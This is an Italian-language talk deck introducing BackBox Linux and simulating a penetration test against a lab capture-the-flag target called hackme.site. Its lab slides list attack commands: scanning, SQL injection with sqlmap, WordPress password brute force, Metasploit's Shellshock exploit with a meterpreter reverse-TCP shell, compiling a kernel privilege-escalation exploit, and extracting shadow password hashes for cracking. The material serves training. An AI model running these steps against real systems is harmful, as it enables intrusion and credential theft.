Upload
andrea-draghetti
View
1.079
Download
4
Embed Size (px)
Citation preview
BackBox LinuxPenetration Test and Security Assessment
RaspiBO - 23 Febbraio 2016
Simulazione di un Penetration Test
Andrea Draghetti
About Me
BackBox Team Member
Over Security Founder
Independent Security Researcher
….
About BackBox
BackBox è una distribuzione Free Open Source nata nel 2010 in Italia ed è concepita per gli appassionati di Sicurezza Informatica!
Permette di effettuare Penetration Testing e Security Assessment.
È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT Security, Mobile Analysis, ecc.
Ha un piano di rilascio previsto ogni 4 mesi e compatibile con
ecosistemi a 32 o 64Bit.
Look At The WorldDistroWatch attesta
a BackBox la seconda posizione della sua
categoria. È la 56° distro Linux più scaricata
al mondo.
BackBox 4.5 ha ottenuto oltre
40mila download dal 26 Gennaio 2016
Linux User & Developer - Feb 2016
Screenshot
Follow BackBox
backbox.org
launchpad.net/~backbox
facebook.com/backbox.linux
twitter.com/backboxlinux
Penetration Test
Il penetration test è un processo di valutazione della sicurezza di un sistema o di una rete che simula
l’attacco di un utente malintenzionato. L’analisi viene condotta sfruttando l’intelletto umano e software
dedicati, ed ha come obiettivo quello di evidenziare le debolezze del sistema fornendo il maggior numero di informazioni sulle vulnerabilità che hanno permesso
l’accesso non autorizzato.
Simulazione di un Penetration Test
I. Information Gathering II. Vulnerability Assessment III. Exploitation IV. Privilege Escalation V. Maintaining Access VI. Reporting.
Documento completo sulla simulazione di un Penetration Test
http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf
Standard, in fase di definizione, degli elementi fondamentali di un PenTest
http://www.pentest-standard.org
Lab: Capture the Flag
Capture the Flag, letteralmente “cattura la bandiera”, è una modalità di simulazione del Penetration Testing per allenarsi e
migliorare le proprie abilità.
vulnhub.com contiene un importante archivio di macchine virtuali preparate per effettuare penetration testing in locale.
ctftime.org raggruppa i principali eventi di CTF mondiali e i punteggi dei partecipanti.
seeweb.it annualmente organizza una sfida di Hacking con importanti premi in palio.
Lab
BackBox Linux
Target: hackme.site
Flag: /root/flag.txt
Lab: Information Gathering
BackBox Linux
• Porte • 22 SSH • 80 Apache
• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin
• dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
Target: hackme.site
Lab: Vulnerability Assessment
BackBox Linux
• Porte • 22 SSH • 80 Apache
• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin
• Panel • SQL Injection
Target: hackme.site
• sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
Lab: Vulnerability Assessment
BackBox Linux
Target: hackme.site
• Porte • 22 SSH • 80 Apache
• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin
• Panel • SQL Injection
• Wordpress • XSS Vulnerability • No Brute force protection
• wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin
• wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
Lab: Exploitation
BackBox Linux
Target: hackme.site
• Porte • 22 SSH • 80 Apache
• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin
• Panel • SQL Injection
• Wordpress • XSS Vulnerability • No Brute force protection
• CGI • Shellshock Vulnerability
• shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/
reverse_tcp • use exploit/multi/http/
apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
Lab: Privilege Escalation
BackBox Linux
Target: hackme.site
• Porte • 22 SSH • 80 Apache
• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin
• Panel • SQL Injection
• Wordpress • XSS Vulnerability • No Brute force protection
• CGI • Shellshock Vulnerability
• Shell • Kernel Privilege Escalation
• extra: john pass • extra: unshadow passwd shadow > pass • cat /root/flag.txt • ./exploit • gcc 18411.c -o exploit • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/
reverse_tcp • use exploit/multi/http/
apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp
--wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254
Lab
BackBox Linux
Target: hackme.site
Happy Hacking!
Questions?